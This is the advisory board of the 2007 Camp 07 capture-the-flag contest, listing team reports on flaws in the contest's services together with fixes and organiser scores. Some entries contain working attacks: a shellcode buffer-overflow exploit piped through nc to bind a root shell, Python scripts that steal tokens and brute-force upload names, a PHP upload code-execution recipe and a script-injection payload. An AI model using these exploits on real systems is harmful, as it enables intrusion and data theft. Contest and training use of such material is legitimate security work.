Camp 07 CTF

Navigation

Advisories

Reporting time	Team	Description	State
1186876864	luckyluke	The SMTP client doesn't correctly implement SMTP - it doesn't wait for the server to reply to its requests	pending
1186876511	InnovaDorf	LightTPD 1.4.12 has a vulnerability posted on several pages. As the net is down, I can't look them up right now...	rejected	[0] that is not one of our services and is fixed in updates of FreeBSD
1186875752	DrunkenSheeps	#!/bin/sh # # retserv exploit, binshell at 17664 # IP=$1 ADDRESS=$2 echo "trying $IP w/ address $ADDRESS" ( printf "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x61\xeb\x7e\x5f\xc6\x47\x08\x9a\x89\x47\ \x09\x89\x47\x0d\xc6\x47\x0d\x07\xc6\x47\x0f\xc3\x50\x53\x6a\x01\ \x6a\x02\x8d\x4f\x08\xff\xd1\x89\x47\x24\xb0\x68\x50\x6a\x10\xb3\x02\ \x66\x89\x5f\x10\xb3\x45\x66\x89\x5f\x12\x89\x57\x14\x8d\x5f\x10\x53\xff\x77\x24\xff\xd1\ \xb0\x6a\x50\x6a\x02\xff\x77\x24\xff\xd1\xb0\x1e\x50\x52\x52\xff\ \x77\x24\xff\xd1\x89\xc3\xb0\x5a\x50\x52\x53\xff\xd1\xb0\ \x5a\x50\x42\x52\x53\xff\xd1\xb0\x5a\x50\x42\x52\x53\xff\xd1\xb0\x3b\x31\xdb\x50\ \x88\x5f\x07\x53\x89\x7f\x10\x8d\x5f\x10\x53\ \x57\xff\xd1\xe8\x7d\xff\xff\xff/bin/sh\x90" ; \ perl -e 'print "A" x 901' ; printf "${ADDRESS}" ) \| nc $IP 1111 # eof. note: you must find out the base address of buf	accepted	[2] remote root is always nice
1186874677	InnovaDorf	kannx : using a negative or to high index causes a ArrayOutOfBoundsException in TransferCommand line 68 (in Account Dialog)	accepted	[2] ack
1186872805	InnovaDorf	Tool to determine the web server's time using a HEAD request to have a high chance to guess the timestamp in an uploaded file's name. --- 8< --------------- #!/usr/bin/env python # -- coding: utf-8 -- """Ask a Webserver for his current time.""" from __future__ import with_statement from contextlib import closing from datetime import datetime from optparse import OptionParser import socket if __name__ == '__main__': parser = OptionParser(usage='%prog <host> [port]') args = parser.parse_args()[1] try: host = args.pop() except IndexError: parser.print_help() parser.exit() try: port = int(args.pop()) except (IndexError, ValueError): port = 80 # Read HTTP HEAD response. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) with closing(s) as s: s.connect((host, port)) s.send('HEAD / HTTP/1.0\r\n\r\n') data = s.recv(1024) # Skip the first line with the HTTP method. lines = (line for line in data.split('\r\n')[1:] if line) # Create a mapping of the headers. headers = dict(line.split(': ') for line in lines) # Parse date/time. dt_str = headers['Date'] dt_obj = datetime.strptime( dt_str.rsplit(' ', 1)[0], '%a, %d %b %Y %H:%M:%S') print dt_str print dt_obj print dt_obj.strftime('%s')	accepted	[1] It's a vulnerability, but the timestamp doesn't get you anywhere
1186872685	InnovaDorf	scorebot doesn't like mixed bash/awk scripts...	rejected	[0] please provide an example by uploading it to your own webserver and giving us an URL to it
1186872016	InnovaDorf	Exploit for the guessable timestamp vulnerability in the PHP upload. --- 8< --------------- #!/usr/bin/env python """Try to access an uploaded file by brute-forcing the timestamp contained in its name.""" from optparse import OptionParser from urllib2 import urlopen, HTTPError if __name__ == '__main__': parser = OptionParser(usage='%prog <url> <start> <stop>') try: url, start, stop = parser.parse_args()[1] start = int(start) stop = int(stop) except ValueError: parser.print_help() parser.exit() for i in range(start, stop): try: xurl = url % i print urlopen(xurl).read() except HTTPError, e: #print e pass	accepted	[0] guessing the timestamp is not enough
1186871855	InnovaDorf	Fix for the `ID=.` hole in `recv.cgi`. --- 8< --------------- echo "$1" \| grep '^[[:xdigit:]]$' && \	accepted	[1] thx
1186871570	InnovaDorf	Exploit for the `ID=.` hole in `recv.cgi`. --- 8< --------------- #!/usr/bin/env python """Fetch the last well-formed token in a website.""" from optparse import OptionParser from sys import exit from urllib2 import urlopen, URLError if __name__ == '__main__': parser = OptionParser(usage='%prog <host>') args = parser.parse_args()[1] if len(args) != 1: parser.print_help() parser.exit() # Read data via HTTP. url = 'http://%s:31337/recv.cgi?ID=.' % args[0] try: data = urlopen(url).read() except URLError, e: exit(str(e)) # Extract last token. last_token = None for line in data.split('\n'): if not line.startswith('daten: '): continue token = line[7:] if len(token) != 64: continue last_token = token if last_token is None: exit(1) print last_token	accepted	[1] thx
1186871463	LegionOfTheStaticDiscord	By passing ".*" as the ID to pocerws' recv.cgi it is possible to retrieve all Texts.	accepted	[2] please provide a exploit or a fix too
1186871168	luckyluke	The retserver program is missing a directory traversal check in getmsg(). You can supply a msgid containing "../", thus reading files from the filesystem. Fix: at the beginning of getmsg() add: + if (strchr(msgid, '/')) + return; snprintf(filename, 1024, "%s/%s", MAILDIR, msgid);	accepted	[2] reading arbitray files could be exploitable hint hint
1186869787	InnovaDorf	kannx: SetecFinanceBroker line 159 It is possible to pass negative Amount to increase the balance (what is not very sensable for outgoing transfers	accepted	[2] very nice
1186869207	luckyluke	The adlsmtp python script "deliver.py" allows to exit the mailbox dir and to overwrite arbitrary files when using "../" in the receiver mail address. The bug can be fixed by adding 'if rcpt.find("/"): return' before this line: mail = open("%s/%s" % (mailpath, rcpt), 'a')	accepted	[2] good catch
1186868135	DrunkenSheeps	adlmailserver retserver main.c line 62-77 reported by ctf07_gopher bufferoverlow exploit possible, you can easily bind a shell on the remoteserver. exploit coming as soon our shellcode is working	accepted	[2] rite, awaiting your exploit
1186867890	DrunkenSheeps	scorebot if supplying a advisory and entering a longtext without returns (a very long string as report) it prints error 127 and submits a empty advisory	accepted	[0] Yeah, but this doesn't affect others, but only yourself
1186867811	DrunkenSheeps	tarot2.erl allows to store files whereever you want after a connection and the command "help me" you can just enter /tmp/foo and press return, it will store a file in /tmp/foo because it sets Key=Data where Data is the userinput. To store the file file_write(Key,Data) is used. So you get a file with the same content	accepted	[2] yup -- I see you speak erlang
1186867198	InnovaDorf	Mail Service retserver/main.c: missing free(tmpfn); after strdup(). even better: use const char* directly: int tmpfile = mkstemp("/var/tmp/retserver.XX");	accepted	[0] not security relevant
1186865681	InnovaDorf	the unused goph service has an mem-leak when using the LS token. attached patch should fix (at least) this: diff -uNr goph.bak/goph.y goph/goph.y --- goph.bak/goph.y Sat Aug 11 20:42:07 2007 +++ goph/goph.y Sat Aug 11 21:44:49 2007 @@ -25,7 +25,7 @@ start: RUN PARAM { runbin($1, $2); free($1); free($2); } \| TEXT PARAM { printf("lklkl"); runnone($1); free($1); free($2); } - \| LS { system("ls"); } + \| LS { system("ls"); free($1); } ;	accepted	[2] nice find
1186865343	InnovaDorf	PocerWS: Directory Traversion possible. In line 39, there still exists a bug in the regexp. Although absolute paths are now not possible anymore (see 1186854356) if properly fixed, directory traversal is still possible trough using syntax like "/../../". As the location of the se rvice is known, it is very easy using "/../../" to get to / in the FS. So everyt hing is still runnable	accepted	[2] accepted
1186861151	luckyluke	The password for the UNDB service is transfered in clear text over TCP. In addition, it is used as a GET parameter which is visible to the user and shoulder surfers through the browser URL line. Fix: change all forms from GET to POST.	rejected	[0] POST still transmits in plaintext. Unencrypted passworts is more of a transport layer issue
1186861129	luckyluke	The files/ directory and authfile for the UNDB service are located in the www-root, which is not required for the service to work. Both entries should be moved outside of the www-root and the references in the php scripts should be changed. This example moves them one directory up: login_inc.php: s/"authfile"/"..\/authfile"/ list.php: s/"files"/"..\/files"/ upload.php: s/www\/files/files/	accepted	[2] Placing that outside of the www-root is a good idea. Nice advicory including the suggestion of a fix
1186861128	Becksgold	is is possible to fill the harddisk of the server with rubbish until they are full. because the MAXSIZE of the uploaded file is stored in a hidden fieform. this can be overriden with firebug (e.g.) the MAXSIZE is not checked in recv.php several files are requierd to fill the HDDs. possible solution: static checking in recv.php AND limit the number of files uploaded per IP etc.	accepted	[1] MAXSIZE is also filled by the PHP module. DOS is possible so but not very interessting.
1186861091	luckyluke	The UNDB application contains an authentication vulnerability: the user ID is read from a GET parameter instead of using the authentication database. This allows a legal user to imersonate another one by changing the id= value in the URL, thus getting access to the other users flag. Fix: use check($country, $password) return value for $id in list.php, recv.php and upload.php (line 17 or 18)	accepted	[4] Good catch. Nice advisory. Right fix.
1186861030	luckyluke	The kannx service allows a password change through an insecure clear text connection. This should be changed to an SSL encrypted service or replaced by transferring only the hashed password / a challenge response mechanism.	accepted	[0] transport layer problem. feel free to replace for hackpoints. see http://10.255.1.3/kannx.py
1186854356	InnovaDorf	pocerws2.rb is exploitable because it allows execution of any script passed as URL path (using a double slash after the host:port). it just strips the "GET /" prefix but does not enforce any checks on which file with which extension/type or whatever should be executed. although this is limited to scripts (no binaries), a malicious script introduced by an attacker (maybe using php upload) can then be executed. one can limit access to certain file types, but usually passing unfiltered arguments to a `system()` call and especially providing a service to offer an even unsecured remote shell is a very bad and stupid idea.	accepted	[2] indeed
1186854197	InnovaDorf	modul undb beim anlegen von useraccounts koennen bestehende useraccounts uebershrieben werden	accepted	[2] good
1186852179	lamerville	sendmail is expected to be running, not starting up upon boot, fix rc.conf	rejected	[0] You may fix it for us ;-)
1186852060	DrunkenSheeps	undb service (webserver, php application) With http://x.x.x.x/upload.php u can upload any file. So u may upload php files and execute them on the server. Files will be created like this: $userId _ $timestampOfUpload _ $filename A quick fix would be to drop the extension of the file. On line 35 of recv php add something like $partBeforePoint = explode('.',basename($_FILES['userfile']['name'])); $newName = $partBeforePoint[0]; Example: upload a file with the contents and the name foo.php: <?php phpinfo (); ?> u will get a file wich is named like: 1_timestamp_foo.php in the files subdirectory... if u execute it u will have the php information or anything else u want to put in the script.	accepted	[3] good, but please mind your language
1186851457	InnovaDorf	clear text HTTP GET is not way better using SSL - since they are clear readable in the adress location bar.	rejected	[0] That's not a vulnerability in the service
1186851348	LegionOfTheStaticDiscord	recv.php allows authenticated attackers to upload files which can be executed from remote. the script keeps the suffix of the uploaded file and moves it with some guessable prefix to the files directory. (recv.php 35-37)	accepted	[3] omg, that gets you a lot of points ;-)
1186850034	LegionOfTheStaticDiscord	The password for United Nations access is transported in clear text via HTTP GET parameters.	accepted	[1] you're right, using SSL is better
1186849634	LegionOfTheStaticDiscord	the syslog service is listening on udp port 514 for the outside by default. this can lead to all kinds of problems, disk space DoS, log file entry spoofing, etc. etc.	accepted	[2] ok
1186849526	LegionOfTheStaticDiscord	The United Nations password for user "test" is "foobar".	rejected	[0] use it to exploit, but advisories must be about implementation flaws
1186849469	LegionOfTheStaticDiscord	sendmail is running by default and listening on port 25. everybody knows sendmail is vulnerable, right?	rejected	[0] I didn't know :)
1186849365	LegionOfTheStaticDiscord	The authfile for the web app is publicly accessible.	accepted	[2] ok -- but they are hashed
1186848715	LegionOfTheStaticDiscord	The installed BIND version is prone to multiple DoS vulns. See http://security.freebsd.org/advisories/FreeBSD-SA-07:02.bind.asc	rejected	[0] bind is not running
1186848692	luckyluke	<script type='text/javascript'>alert('owned by team 6');</script>	rejected	[0] wtf
1186848462	luckyluke	it's running sendmail 1.8.3	rejected	[0] wtf
1186848421	LegionOfTheStaticDiscord	FreeBSD 6.2-RELEASE's tcpdump is prone to a buffer overflow in the BGP parsing code See http://security.freebsd.org/advisories/FreeBSD-SA-07:06.tcpdump.asc	rejected	[0] tcpdump is not a service
1186848418	luckyluke	it's running freebsd 6.2 beta3	accepted	[1] right
1186848365	DrunkenSheeps	freebsd :P	accepted	[2] right
1186848335	InnovaDorf	FreeBSD	rejected	[0] sorry, you weren't the fastest
1186838089	NotSoGoodButWantToLearn	proxyarp is enabled on the switches :) ... lladdr 00:01:43:e4:b4:0a REACHABLE	accepted	[1] ok

Reporting flags and advisories

To report flags and/or report advisories, telnet to , port 8080. Follow the instructions given there!

Last updated August 16 2007 15:54:57